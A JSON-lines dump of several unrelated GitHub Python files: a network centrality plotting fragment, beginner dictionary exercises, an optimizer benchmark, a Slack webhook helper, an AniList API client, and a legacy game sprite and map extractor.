{graph_num_edge} edges. \")\n\nnode_bet_central = nx.betweenness_centrality(G)\npickle.dump(node_bet_central, open(\"node_betweeen_centrality.pkl\", 'wb'))\n\nres = np.array([(int(key), node_bet_central[key]) for key in node_bet_central.keys() ])\nres_sorted = res[res[:,0].argsort()]\nax.xaxis.set_minor_locator(MultipleLocator(10))\n\n\npos = dict(zip(idx.astype(int), np.column_stack((x, y, z))))\n\npos = {}\nfor i in range(len(idx)):\n pos[str(int(idx[i]))] = (x[i], y[i], z[i])\n\nfor key in pos.keys():\n position[key] = {'posi': pos[key]}\n\nnx.set_node_attributes(G, poistion)\n\npos = nx.get_node_attributes(G, 'posi')\nn = G.number_of_nodes()\n\ndegrees = [val for (node, val) in G.degree()]\n\nedge_max = max(degrees)\ncolors = [plt.cm.plasma(degrees[i]/edge_max) for i in range(n)]\n\nwith plt.style.context(('ggplot')):\n fig = plt.figure(figsize=(10,7))\n ax = Axes3D(fig)\n\n for key, value in pos.items():\n xi = value[0]\n yi = value[1]\n zi = value[2]\n\n ax.scatter(xi, yi, zi, c=colors[key], s=20+20*G.degree(key), edgecolors='k', alpha=0.7)\n\n for i, j in enumerate(G.edges()):\n x = np.array((pos[j[0]][0], pos[j[1]][0]))\n y = np.array((pos[j[0]][1], pos[j[1]][1]))\n z = np.array((pos[j[0]][2], pos[j[1]][2]))\n ax.plot(x, y, z, c='black', alpha=0.5)\n\n ax.view_init(30, angle)\n ax.set_axis_off()\n\n plt.show()\n\n return\n\n\n","repo_name":"AspirinCode/MD-analysis-tools-scripts","sub_path":"network/calc_bet_centrality.py","file_name":"calc_bet_centrality.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"40192103835","text":"x = [ [5,2,3], [10,8,9] ] \nstudents = [\n {'first_name': 'Michael', 'last_name' : 'Jordan'},\n {'first_name' : 'John', 'last_name' : 'Rosales'}\n]\nsports_directory = {\n 'basketball' : ['Kobe', 'Jordan', 'James', 'Curry'],\n 'soccer' : ['Messi', 'Ronaldo', 'Rooney']\n}\nz = [ {'x': 10, 'y': 20} ]\n# 1\n\n# a\nx[1][0] = 15\nprint(x)\n# b\nstudents[0]['last_name'] = 'Bryant'\n# c\nsports_directory[\"soccer\"][0] = \"Andres\"\n# d\nz[0]['y'] = 30\n\n# 2\nstudents = [\n {'first_name': 'Michael', 'last_name' : 'Jordan'},\n {'first_name' : 'John', 'last_name' : 'Rosales'},\n {'first_name' : 'Mark', 'last_name' : 'Guillen'},\n {'first_name' : 'KB', 'last_name' : 'Tonel'}\n]\n\ndef iterateDictionary(some_list):\n for i in range (len(some_list)):\n 
print(some_list[i])\n\niterateDictionary(students)\n\n# 3\n# def iterateDictionary2(key_name, some_list):\n#     for i in range( len(some_list)):\n#         if key_name == \"first_name\":\n#             print(some_list[i][\"first_name\"])\n#         elif key_name == \"last_name\":\n#             print(some_list[i][\"last_name\"])\n\n# iterateDictionary2(\"first_name\", students)\n# iterateDictionary2(\"last_name\", students)\n\ndef iterateDictionary2(key_name, some_list):\n    for i in range( len(some_list)):\n        print(some_list[i][key_name])\niterateDictionary2(\"first_name\", students)\niterateDictionary2(\"last_name\", students)\n\n# 4\n\ndojo = {\n    'locations': ['San Jose', 'Seattle', 'Dallas', 'Chicago', 'Tulsa', 'DC', 'Burbank'],\n    'instructors': ['Michael', 'Amy', 'Eduardo', 'Josh', 'Graham', 'Patrick', 'Minh', 'Devon']\n}\n\ndef printInfo(some_dict):\n    keys = list(some_dict.keys())   # dict_keys is not subscriptable in Python 3\n    for i in range(len(keys)):\n        # pair each key with its neighbour, preserving the original even/odd branching\n        other = keys[i + 1] if i % 2 == 0 else keys[i - 1]\n        print(str(len(some_dict[other])) + \" \" + other.upper())\n        for value in some_dict[other]:\n            print(value)\n\nprintInfo(dojo)","repo_name":"Itserge1/Coding_Dojo_Python","sub_path":"Core_assigment/functions_intermediat/functions_intermediate_i.py","file_name":"functions_intermediate_i.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"72590116643","text":"import time\n\nfrom Initializers.RandomInitializer import RandomInitializer\nfrom Logging.FileLogger import FileLogger\nfrom Optimizers.RandomWalk import RandomWalk\nfrom Problems.Sphere import Sphere\n\nif __name__ == \"__main__\":\n    dimensions = 2\n    iterations = 10000\n    problem = Sphere(dimensions)\n    logger = FileLogger(iterations, iterations, 0, \"random_walk_fitness.csv\")\n    initializer = RandomInitializer(dimensions)\n\n    start = time.time()\n    optimizer = RandomWalk(problem, logger, initializer)\n    print(f'Starting Best Fitness: {optimizer.bestFitness}')\n    for i in range(iterations):\n        optimizer.optimize()\n    end = time.time()\n\n    print(f'Best Fitness Found: {optimizer.bestFitness}')\n    print(f'Elapsed Time: {end - start}')","repo_name":"firestrand/pyOptimize","sub_path":"BenchmarkOptimization.py","file_name":"BenchmarkOptimization.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"221848447","text":"import requests\nimport json\nimport nflpool.data.secret as secret\n\n\nclass SlackService:\n    @staticmethod\n    def send_message(message_string):\n        \"\"\"\n        Set the webhook_url to the one provided by Slack when you create the webhook\n        at https://my.slack.com/services/new/incoming-webhook/\n        \"\"\"\n\n        slack_webhook_url = secret.slack_webhook_url\n        slack_data = {\"text\": message_string}\n\n        response = requests.post(\n            slack_webhook_url,\n            data=json.dumps(slack_data),\n            headers={\"Content-Type\": \"application/json\"},\n        )\n        if response.status_code != 200:\n            raise ValueError(\n                \"Request to slack returned an error %s, the response is:\\n%s\"\n                % (response.status_code, response.text)\n            
)\n","repo_name":"prcutler/nflpool","sub_path":"nflpool/services/slack_service.py","file_name":"slack_service.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"24875254602","text":"# Preprocess user data\n# Convert tabs into pipes\n# Turn timestamps from ms since epoch into a string that C* will like\n\nfrom datetime import datetime\nimport sys\nimport argparse\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-t', '--timestamp-token', type=int, default=None,\n help='Index of field containing timestamp')\n\nargs = parser.parse_args()\n\nfor line in sys.stdin:\n toks = line.split('\\t')\n\n if args.timestamp_token != None:\n\n dt = datetime.fromtimestamp(int(toks[args.timestamp_token]))\n toks[args.timestamp_token] = dt.strftime('%Y-%m-%d %H:%M:%S')\n\n print('|'.join(toks))\n","repo_name":"wibiclint/moviegenie","sub_path":"scripts/pp.py","file_name":"pp.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"3856191777","text":"import logging\n\nlogger_anilist = logging.getLogger(__name__)\nlogger_anilist.addHandler(logging.NullHandler())\n\nfrom anime import network\nfrom anime.enums import Lang\n\n\nendpoint = 'https://graphql.anilist.co'\ncheck_login = \"\"\"\n query {\n Viewer {\n id\n name\n }\n }\"\"\"\nquery_anime = \"\"\"\n query($page: Int, $search: String, $id: Int, $ids: [Int]) {\n Page(page: $page, perPage: 50) {\n pageInfo {\n hasNextPage\n }\n media(search: $search, id: $id, id_in: $ids, type: ANIME) {\n id\n title {\n romaji\n english\n native\n }\n synonyms\n bannerImage\n coverImage {\n extraLarge\n }\n nextAiringEpisode {\n episode\n airingAt\n }\n }\n }\n }\n \"\"\"\nquery_current = \"\"\"\n query($uid: Int) {\n MediaListCollection(userId: $uid, status: CURRENT, type: ANIME) {\n lists {\n name\n isCustomList\n isSplitCompletedList\n status\n entries {\n media {\n id\n status\n title {\n romaji\n english\n native\n userPreferred\n }\n synonyms\n bannerImage\n coverImage {\n extraLarge\n }\n nextAiringEpisode {\n episode\n airingAt\n }\n }\n }\n }\n }\n }\n \"\"\"\nquery_anime_entries = \"\"\"\n query($page: Int, $uid: Int, $id: Int, $ids: [Int]) {\n Page(page: $page, perPage: 50) {\n pageInfo {\n hasNextPage\n }\n mediaList(userId: $uid, mediaId: $id, mediaId_in: $ids, type: ANIME) {\n id\n mediaId\n status\n customLists\n }\n }\n }\"\"\"\nmutate_anime_entry = \"\"\"\n mutation($id: Int, $mediaId: Int, $status: MediaListStatus, $customLists: [String]) {\n SaveMediaListEntry(id: $id, mediaId: $mediaId, status: $status, customLists: $customLists) {\n id\n mediaId\n customLists\n }\n }\"\"\"\n\n\ndef ask(msg, choices, index=False, show=False, default=None, limit=0, none=False):\n while True:\n print(msg)\n if show:\n for i in range(len(choices)):\n if limit != 0 and i != 0 and i % limit == 0:\n ans = input('>')\n if ans != '':\n if ans in choices:\n if index:\n return choices.index(ans)\n else:\n return ans\n ans = int(ans) - 1\n if -1 < ans < i:\n if index:\n return ans\n else:\n return choices[ans]\n print(msg)\n print(f'{i + 1}) {choices[i]}')\n if none:\n print(f'{i + 2}) None')\n ans = input('>')\n if ans == '' and show:\n return default\n if ans in choices:\n if index:\n return choices.index(ans)\n else:\n return ans\n\n if show:\n ans = int(ans) - 1\n if ans == len(choices) and none:\n return None\n elif -1 < ans < len(choices):\n if index:\n return ans\n 
else:\n return choices[ans]\n\n\ndef check_api_limit(limit, perTime):\n from time import sleep\n count = 0\n while True:\n if count == limit:\n logger_anilist.info('API limit reached. Waiting for %d seconds...', perTime)\n sleep(perTime)\n count = 0\n logger_anilist.info('Finished Waiting.')\n count += 1\n yield count\n\n\nAPI_limit = check_api_limit(limit=90, perTime=65)\nheaders = None\nuser = 'None'\n\n\ndef request(query, variables=None):\n next(API_limit)\n response = network.request(endpoint, headers=headers, json={'query': query, 'variables': variables})\n if \"errors\" in response.keys():\n for err in response[\"errors\"]:\n logger_anilist.error('API response NOT OK! Status code = %d \"%s\" %s', err[\"status\"], err[\"message\"], str(err['locations'][0]))\n return None\n logger_anilist.debug('API response OK!')\n return response[\"data\"]\n\n\ndef get_auth():\n network.open('https://anilist.co/api/v2/oauth/authorize?client_id=14129&response_type=token')\n\n\ndef set_auth(auth):\n global headers, user\n tmp = headers\n headers = {'Authorization': 'Bearer ' + auth,\n 'Content-Type': 'application/json',\n 'Accept': 'application/json'}\n result = request(check_login)\n if result is None:\n headers = tmp\n return False\n user = result['Viewer']['id']\n return True\n\n\ndef is_authorized():\n return headers is not None\n\n\ndef get_current_anime(uid='None', dump=False):\n if uid == 'None':\n uid = user\n variables = {'uid': uid}\n next(API_limit)\n response = request(query_current, variables)\n response = response['MediaListCollection']['lists'][0]['entries']\n medias = [entry['media'] for entry in response if entry['media']['status'] == 'RELEASING']\n if dump:\n import json\n with open('response.json', 'w', encoding='utf-8') as f:\n json.dump(medias, f, ensure_ascii=False)\n return medias\n\n\ndef get_anime(search=None, ids=None, auto=True, lang=Lang.NATIVE, dump=False):\n page = 1\n variables = {'page': page}\n if ids is not None:\n if isinstance(ids, int):\n variables['id'] = ids\n\n response = request(query_anime, variables)\n media = response[\"Page\"][\"media\"][0]\n else:\n variables['ids'] = ids\n\n response = request(query_anime, variables)\n hasNextPage = response[\"Page\"][\"pageInfo\"][\"hasNextPage\"]\n media = response[\"Page\"][\"media\"]\n while hasNextPage:\n page += 1\n variables['page'] = page\n response = request(query_anime, variables)\n hasNextPage = response[\"Page\"][\"pageInfo\"][\"hasNextPage\"]\n media.extend(response[\"Page\"][\"media\"])\n elif search is not None:\n variables['search'] = search\n\n response = request(query_anime, variables)\n if auto:\n media = response[\"Page\"][\"media\"][0]\n else:\n hasNextPage = response[\"Page\"][\"pageInfo\"][\"hasNextPage\"]\n medias = response[\"Page\"][\"media\"]\n mediass = []\n ans = ask(search + ' :', [media['title'][str(lang)] for media in medias], index=True, show=True, limit=10)\n while ans is None:\n if hasNextPage:\n mediass.append(medias)\n page += 1\n variables['page'] = page\n response = request(query_anime, variables)\n hasNextPage = response[\"Page\"][\"pageInfo\"][\"hasNextPage\"]\n medias = response[\"Page\"][\"media\"]\n ans = ask(search + ' :', [media['title'][str(lang)] for media in medias], index=True, show=True, limit=10)\n else:\n if len(medias) != 0:\n mediass.append(medias)\n medias = []\n ans = ask(search + ' :', [media['title'][str(lang)] for medias in mediass for media in medias], index=True, show=True, limit=10)\n # when last page is reached this becomes true\n # len(mediass) = page - 1 
except for the last page\n if page > len(mediass):\n media = medias[ans]\n else:\n media = mediass[int(ans / len(mediass[0]))][ans % len(mediass[0])]\n\n if dump:\n import json\n with open('response.json', 'w', encoding='utf-8') as f:\n json.dump(media, f, ensure_ascii=False)\n return media\n\n\ndef get_anime_entires(ids, uid='None', dump=False):\n if uid == 'None':\n uid = user\n page = 1\n variables = {'page': page, 'uid': uid}\n if isinstance(ids, int):\n variables['id'] = ids\n\n response = request(query_anime_entries, variables)\n media = response[\"Page\"][\"mediaList\"][0]\n else:\n variables['ids'] = ids\n\n response = request(query_anime_entries, variables)\n hasNextPage = response[\"Page\"][\"pageInfo\"][\"hasNextPage\"]\n media = response[\"Page\"][\"mediaList\"]\n while hasNextPage:\n page += 1\n variables['page'] = page\n response = request(query_anime_entries, variables)\n hasNextPage = response[\"Page\"][\"pageInfo\"][\"hasNextPage\"]\n media.extend(response[\"Page\"][\"mediaList\"])\n\n if dump:\n import json\n with open('response.json', 'w', encoding='utf-8') as f:\n json.dump(media, f, ensure_ascii=False)\n return media\n\n\ndef add_anime_to_customlists(id, customlists, is_mediaId=False):\n if is_mediaId:\n variables = {'mediaId': id, 'status': 'PLANNING', 'customLists': customlists}\n else:\n variables = {'id': id, 'customLists': customlists}\n result = request(mutate_anime_entry, variables)\n if result is None:\n return False\n else:\n return True\n","repo_name":"Omar-Abdul-Azeez/anime_manager","sub_path":"anime/anilist_api.py","file_name":"anilist_api.py","file_ext":"py","file_size_in_byte":10424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37772115281","text":"# import __main__ as main\n# from Helper.TimerLogger import CodeTimeLogging\n# fileName = main.__file__\n# fileName = fileName.split('\\\\')[-1]\n\n# CodeTimeLogging(Flag='F', filename=fileName, Tag='Array', Difficult='Medium')\n\n\ndef findPartten(nums):\n n = len(nums)\n if n < 3:\n return False\n stack = []\n right = float('-inf')\n for i in reversed(range(n)):\n if nums[i] < right:\n return True\n else:\n while stack and nums[i] > stack[-1]:\n right = stack.pop()\n stack.append(nums[i])\n return False\n\n\nnums = [1, 2, 3, 4]\nprint(findPartten(nums))\n","repo_name":"Omkar02/FAANG","sub_path":"AZ_LC_456_132_pattern.py","file_name":"AZ_LC_456_132_pattern.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26079427654","text":"import os\nimport png\nimport struct\nimport math\nimport glob\nimport json\n\ndef run():\n\tmaps = dict([parse_map(pam_file) for pam_file in glob.glob(\"./input/MAPS/*.PAM\")])\n\tprint(json.dumps(maps))\n\t# parse_file('./input/COLONIES/LGCOL1.CMP', './out/images/test.png', 32)\n\t# parse_file('./input/SIMG/ALIE_SI.ICA', './out/images/structures/alie_si.png', 32)\n\t# parse_file('./input/SIMG/ALIE_SSI.ICA', './out/images/structures/alie_ssi.png', 32)\n\t# parse_file('./input/UIMG/ALIE_SUI.ICA', './out/images/units/alie_sui.png', 32)\n\t# parse_file('./input/UIMG/ALIE_UI.ICA', './out/images/units/alie_ui.png', 32)\n\t# parse_file('./input/ANMS/CAT.ANM', './out/images/anim/cat.png')\n\t# parse_file('./input/TIMG/DESERT.ICA', './out/images/terrain/desert.png', 50)\n\t# parse_file('./input/ANMS/DGS.ANM', './out/images/anim/dgs.png')\n\t# parse_file('./input/ANMS/DMP.ANM', './out/images/anim/dmp.png')\n\t# 
parse_file('./input/ANMS/DMS.ANM', './out/images/anim/dms.png')\n\t# parse_file('./input/ANMS/DPS.ANM', './out/images/anim/dps.png')\n\t# parse_file('./input/TIMG/FOREST.ICA', './out/images/terrain/forest.png', 50)\n\t# parse_file('./input/SIMG/HUMA_SI.ICA', './out/images/structures/huma_si.png', 32)\n\t# parse_file('./input/SIMG/HUMA_SSI.ICA', './out/images/structures/huma_ssi.png', 32)\n\t# parse_file('./input/UIMG/HUMA_SUI.ICA', './out/images/units/huma_sui.png', 32)\n\t# parse_file('./input/UIMG/HUMA_UI.ICA', './out/images/units/huma_ui.png', 32)\n\t# parse_file('./input/ANMS/IMP.ANM', './out/images/anim/imp.png')\n\t# parse_file('./input/ANMS/IMPMEG.ANM', './out/images/anim/impmeg.png')\n\t# parse_file('./input/ANMS/IMPMISS.ANM', './out/images/anim/impmiss.png')\n\t# parse_file('./input/ANMS/KRY.ANM', './out/images/anim/kry.png')\n\t# parse_file('./input/ANMS/MMP.ANM', './out/images/anim/mmp.png')\n\t# parse_file('./input/SIMG/NEUT_SI.ICA', './out/images/structures/neut_si.png', 32)\n\t# parse_file('./input/SIMG/NEUT_SSI.ICA', './out/images/structures/neut_ssi.png', 32)\n\t# parse_file('./input/UIMG/NEUT_SUI.ICA', './out/images/units/neut_sui.png', 32)\n\t# parse_file('./input/UIMG/NEUT_UI.ICA', './out/images/units/neut_ui.png', 32)\n\t# parse_file('./input/ANMS/NUKE.ANM', './out/images/anim/nuke.png')\n\t# parse_file('./input/ANMS/POW.ANM', './out/images/anim/pow.png')\n\t# parse_file('./input/ANMS/RAD.ANM', './out/images/anim/rad.png')\n\t# parse_file('./input/ROADS/ROADS.ICA', './out/images/structures/infra.png', 17)\n\t# parse_file('./input/TIMG/ROCKY.ICA', './out/images/terrain/rocky.png', 50)\n\t# parse_file('./input/ANMS/SBI.ANM', './out/images/anim/sbi.png')\n\t# parse_file('./input/ANMS/X1B.ANM', './out/images/anim/x1b.png')\n\t# parse_file('./input/ANMS/X1S.ANM', './out/images/anim/x1s.png')\n\t# parse_file('./input/ANMS/XAS.ANM', './out/images/anim/xas.png')\n\t# parse_file('./input/ANMS/XHS.ANM', './out/images/anim/xhs.png')\n\ndef parse_map(input_name):\n\n\tterrains = ['desert', 'forest', 'rocky']\n\n\ttouching_lookup = {\n\t\t\"aberdeen\": [\"rock-castle\",\"sparta\",\"marshall\",\"roanoke\",\"creedmoor\",\"garland\"],\n\t\t\"alma\": [\"bromont\",\"granby\",\"brome-lake\"],\n\t\t\"ayden\": [\"rock-castle\",\"high-point\",\"eagle-nest\",\"snake-river\",\"canuck\"],\n\t\t\"brimstone\": [\"norenda\",\"thetfordmines\"],\n\t\t\"brome-lake\": [\"granby\",\"alma\",\"hull\",\"norenda\"],\n\t\t\"bromont\": [\"lachine\",\"sutton\",\"rawdon\",\"granby\",\"alma\"],\n\t\t\"canuck\": [\"ayden\",\"snake-river\",\"point-harbour\"],\n\t\t\"cartasone\": [\"haven\",\"eagle-nest\",\"high-point\",\"milos\"],\n\t\t\"chaos\": [\"garland\",\"creedmoor\"],\n\t\t\"chertsy\": [\"rolland\",\"sutton\",\"rawdon\",\"masson-lake\"],\n\t\t\"creedmoor\": [\"roanoke\",\"aberdeen\",\"garland\",\"chaos\"],\n\t\t\"delos\": [\"sparta\",\"marshall\",\"kinabal\",\"norwood\"],\n\t\t\"eagle-nest\": [\"haven\",\"cartasone\",\"high-point\",\"ayden\",\"snake-river\"],\n\t\t\"elkin\": [\"sparta\", \"milos\"],\n\t\t\"esterel\": [\"kamouraska\",\"orford\",\"valleyfield\"],\n\t\t\"free-city\": [\"lachine\",\"sutton\",\"rolland\"],\n\t\t\"garland\": [\"aberdeen\",\"creedmoor\",\"chaos\"],\n\t\t\"granby\": [\"rawdon\",\"bromont\",\"alma\",\"brome-lake\"],\n\t\t\"haven\": [\"cartasone\",\"eagle-nest\"],\n\t\t\"high-point\": [\"rock-castle\",\"ayden\",\"eagle-nest\",\"cartasone\",\"milos\",\"sparta\"],\n\t\t\"hull\": [\"brome-lake\",\"norenda\",\"thetfordmines\",\"sherbrooke\"],\n\t\t\"kamouraska\": 
[\"esterel\",\"orford\",\"three-rivers\",\"sherbrooke\"],\n\t\t\"kinabal\": [\"norwood\",\"delos\",\"marshall\"],\n\t\t\"lachine\": [\"free-city\",\"sutton\",\"bromont\"],\n\t\t\"marshall\": [\"kinabal\",\"delos\",\"sparta\",\"aberdeen\",\"roanoke\"],\n\t\t\"masson-lake\": [\"chertsy\",\"sherbrooke\"],\n\t\t\"milos\": [\"cartasone\",\"high-point\",\"sparta\",\"elkin\"],\n\t\t\"norenda\": [\"brome-lake\",\"hull\",\"thetfordmines\",\"brimstone\"],\n\t\t\"norwood\": [\"kinabal\",\"delos\"],\n\t\t\"orford\": [\"esterel\",\"valleyfield\",\"three-rivers\",\"kamouraska\"],\n\t\t\"point-harbour\": [\"snake-river\",\"canuck\"],\n\t\t\"rawdon\": [\"chertsy\",\"sutton\",\"bromont\",\"granby\"],\n\t\t\"roanoke\": [\"marshall\",\"aberdeen\",\"creedmoor\"],\n\t\t\"rock-castle\": [\"aberdeen\",\"sparta\",\"high-point\",\"ayden\"],\n\t\t\"rolland\": [\"free-city\",\"sutton\",\"chertsy\"],\n\t\t\"sherbrooke\": [\"masson-lake\",\"hull\",\"thetfordmines\",\"three-rivers\",\"kamouraska\"],\n\t\t\"snake-river\": [\"eagle-nest\",\"ayden\",\"canuck\",\"point-harbour\"],\n\t\t\"sparta\": [\"elkin\",\"milos\",\"high-point\",\"rock-castle\",\"aberdeen\",\"marshall\",\"delos\"],\n\t\t\"sutton\": [\"free-city\",\"rolland\",\"chertsy\",\"rawdon\",\"bromont\",\"lachine\"],\n\t\t\"thetfordmines\": [\"three-rivers\",\"sherbrooke\",\"hull\",\"norenda\",\"brimstone\"],\n\t\t\"three-rivers\": [\"valleyfield\",\"orford\",\"kamouraska\",\"sherbrooke\",\"thetfordmines\"],\n\t\t\"valleyfield\": [\"esterel\",\"orford\",\"three-rivers\"],\n\t\t\"waterloo\": [],\n\t\t\"balkany\": []\n\t}\n\n\t# used for temporarily calculating the terrain types\n\t# terrain_kinds = ['Void', 'Plain','Forest','Water','Mountain','Bridge','Rock']\n\n\twith open(input_name, 'rb') as pam:\n\t\t# 4 byte marker\n\t\t_ = struct.unpack('4s8x', pam.read(12))\n\t\tname, _, _ = [x.decode('ascii').replace('\\00', '') for x in struct.unpack('24s24s24s', pam.read(24*3))]\n\t\tkey = name.replace(' ', '-').lower()\n\n\t\t# exceptions\n\t\tif key == \"sutton-lake\":\n\t\t\tkey = \"sutton\"\n\t\t\tname = \"Sutton\"\n\t\tif key == \"brome-city\":\n\t\t\tkey = \"brome-lake\"\n\t\t\tname = \"Brome Lake\"\n\n\t\tterrain = terrains[struct.unpack('q', pam.read(8))[0]]\n\t\tenergy, credits, research = struct.unpack('bbbx', pam.read(4))\n\t\t# discard the next 6112 - not sure what they are used for - they all start with NEUTRAL and some have a magic number\n\t\t# somewhere in it :/\n\t\t_ = pam.read(6112)\n\t\twidth, height = struct.unpack('ii', pam.read(8)) # all maps are 48x48\n\n\t\ttiles = [[struct.unpack('BxxB12x', pam.read(16))[0] for row in range(height)] for column in range(width)]\n\n\t\treturn (key, {\n\t\t\t \"width\": width,\n\t\t\t\t\t\"height\": height,\n\t\t\t\t\t\"name\": name,\n\t\t\t\t\t\"type\": terrain,\n\t\t\t\t\t\"energy\": int(energy),\n\t\t\t\t\t\"credits\": int(credits),\n\t\t\t\t\t\"research\": int(research),\n\t\t\t\t\t\"touching\": touching_lookup[key],\n\t\t\t\t\t\"tiles\": tiles\n\t\t})\n\n\ndef parse_file(input_name, output_name, row_tile_count=1):\n\tpalette = []\n\tall_imgs = []\n\n\twith open(input_name, 'rb') as ica:\n\t\t# 8 byte Magic CImageF\n\t\tmagic = struct.unpack('8s', ica.read(8))[0].decode('ascii').replace('\\00', '')\n\t\t# number of tiles - 2 byte little-endian\n\t\tnumber_of_tiles = struct.unpack('<h', ica.read(2))[0]\n\t\tprint(\"File has \" + str(number_of_tiles) + \" tiles\")\n\n\t\t# read 4 bytes for each colour in the palette\n\t\tfor i in range(0, 256):\n\t\t\tcolor = struct.unpack('4B', 
ica.read(4))[::-1][1:]\n\t\t\tpalette.append(color)\n\n\t\tmax_width = 0\n\t\tmax_height = 0\n\t\tfor i in range(0, number_of_tiles):\n\t\t\t# 10 bytes for the object id\n\t\t\ttile_id = struct.unpack('4s6s', ica.read(10))[1].decode('ascii').replace('\\00', ' ')\n\n\t\t\ttile_len = struct.unpack('3h', ica.read(6))[1]\n\t\t\theight, width = struct.unpack('2h', ica.read(4))\n\n\t\t\tprint(\"read object \" + tile_id + \" w:\"+str(width)+\" h:\"+str(height)+\" tiles: \"+str(tile_len))\n\n\t\t\tpixel_data = decompress(ica, tile_len, width, height)\n\t\t\timg = []\n\t\t\tfor row in range(0, len(pixel_data)):\n\t\t\t\timg_row = []\n\t\t\t\timg.append(img_row)\n\t\t\t\tfor pixel in pixel_data[row]:\n\t\t\t\t\treal_colour = palette[pixel]\n\t\t\t\t\timg_row.extend(real_colour)\n\n\t\t\tall_imgs.append(img)\n\t\t\tmax_width = max(max_width, width)\n\t\t\tmax_height = max(max_height, height)\n\n\t\t# some X1B.ANM contain tiles of different sizes and require transparent padding to the right and bottom\n\t\tspritesheet = []\n\t\tprint(\"len(all_imgs) = \" + str(len(all_imgs)) + \" where number_of_tiles = \" + str(number_of_tiles) + \"\")\n\n\t\ttransparent_colour = palette[0]\n\n\t\t# for each tile, ensure it's exactly max_width and max_height\n\t\tfor img in all_imgs:\n\t\t\tfor row in img:\n\t\t\t\t# add transparent padding/columns to the right\n\t\t\t\trow.extend((max_width - int(len(row) / 3)) * transparent_colour)\n\t\t\t# add transparent padding/rows at the bottom\n\t\t\tfor i in range(0, max_height - len(img)):\n\t\t\t\timg.append(max_width * transparent_colour)\n\n\t\t# Add each tile image to the spritesheet\n\t\ttarget_tile_count_row = row_tile_count # how many tiles we display on each row\n\t\tfor idx, img in enumerate(all_imgs):\n\t\t\ttarget_row = math.floor(idx/target_tile_count_row)\n\t\t\tfor row_idx, row in enumerate(img):\n\t\t\t\ttarget_row_idx = (target_row * max_height) + row_idx\n\t\t\t\tif target_row_idx + 1 > len(spritesheet):\n\t\t\t\t\tspritesheet.append([])\n\t\t\t\tspritesheet[target_row_idx].extend(row)\n\n\t\t# Ensure that the very last row is the same width as the others by extending with transparent pixels\n\t\t# [ \n\t\t# [ 1, 2, 3, 4, 5 ]\n\t\t# [ 1, 2, 3, 4, 5 ]\n\t\t# [ 1, 2, 3 ]\n\t\t# ]\n\t\t# becomes\n\t\t# [ \n\t\t# [ 1, 2, 3, 4, 5 ]\n\t\t# [ 1, 2, 3, 4, 5 ]\n\t\t# [ 1, 2, 3, 0, 0 ]\n\t\t# ]\n\t\tspritesheet_width = len(spritesheet[0])\n\t\tfor row in spritesheet:\n\t\t\tcount = spritesheet_width - len(row)\n\t\t\tif count == 0: continue\n\t\t\tadditional = [colour for pixel in [transparent_colour] for colour in pixel] * int(count / len(transparent_colour))\n\t\t\trow.extend(additional)\n\n\t\tout_dir = os.path.dirname(output_name)\n\t\tif not os.path.exists(out_dir):\n\t\t\tos.makedirs(out_dir)\n\n\t\twith open(output_name, 'wb') as output:\n\t\t\tw = png.Writer(int(spritesheet_width / 3), len(spritesheet), transparent=transparent_colour)\n\t\t\tw.write(output, spritesheet)\n\n\ndef decompress(data, length, width, height):\n\tall_rows = []\n\n\t# read the number of bytes for this tile\n\tbytes_on_line = struct.unpack(\"B\", data.read(1))[0]\n\ttotal_read = 1\n\n\t# while we have lines to read\n\touter_loop = 0\n\trunning = True\n\twhile running:\n\t\t# read 3 bytes of padding\n\t\tpadding = data.read(3)\n\t\ttotal_read += 3\n\t\tprint(\"padding = \" + str(padding))\n\t\tcurrent_row = []\n\t\tall_rows.append(current_row)\n\n\t\t# while we have instructions to read on this line\n\t\tline_bytes_read = 3\n\t\tinner_loop = 0\n\t\twhile line_bytes_read < bytes_on_line 
- 1:\n\t\t\t# read instruction\n\t\t\tcurrent_instruction = data.read(4)\n\t\t\ttotal_read += 4\n\t\t\tline_bytes_read += 4\n\t\t\tnum_pixels, pixel_colour, drawing_mode = struct.unpack(\"BBH\", current_instruction)\n\t\t\tprint(\"instruction = \" + str(current_instruction) + \" outer:\" + str(outer_loop) + \", inner:\" + str(inner_loop))\n\t\t\tprint(\"scan_data :: num_pixels = \" + str(num_pixels) + \" pixel_colour = \" + str(pixel_colour) + \" drawing_mode:\" + str(drawing_mode))\n\n\t\t\tif drawing_mode == 1:\n\t\t\t\tprint(\"drawing compressed pixels \" + str(num_pixels) + \" of colour \" + str(pixel_colour))\n\t\t\t\tcurrent_row.extend(num_pixels * [pixel_colour])\n\t\t\telif drawing_mode == 2:\n\t\t\t\tpixels = data.read(num_pixels)\n\t\t\t\ttotal_read += num_pixels\n\t\t\t\tline_bytes_read += num_pixels\n\t\t\t\tcurrent_row.extend(pixels)\n\t\t\t\tprint(\"drawing \" + str(num_pixels) + \" uncompressed pixels \" + str(pixels))\n\n\t\t\tinner_loop += 1\n\t\t\tprint(\"end of inner loop: line_bytes_read = \" + str(line_bytes_read) + \", bytes_on_line = \" + str(bytes_on_line))\n\n\t\tif len(current_row) < width:\n\t\t\tx = width - len(current_row)\n\t\t\tprint(\"adding \" + str(x) + \" more to \" + str(len(current_row)))\n\t\t\tcurrent_row.extend(x * [0])\n\t\tif len(current_row) > width:\n\t\t\tdel current_row[width:]\n\t\t\tprint(\"removing new len = \" + str(len(current_row)))\n\t\tprint(\"produced = \" + str(current_row))\n\n\t\tbytes_on_line = struct.unpack(\"B\", data.read(1))[0]\n\t\ttotal_read += 1\n\t\tline_bytes_read += 1\n\t\tif total_read + bytes_on_line > length:\n\t\t\tprint(\"warning 1 @ \" + str(data.tell()) + \" 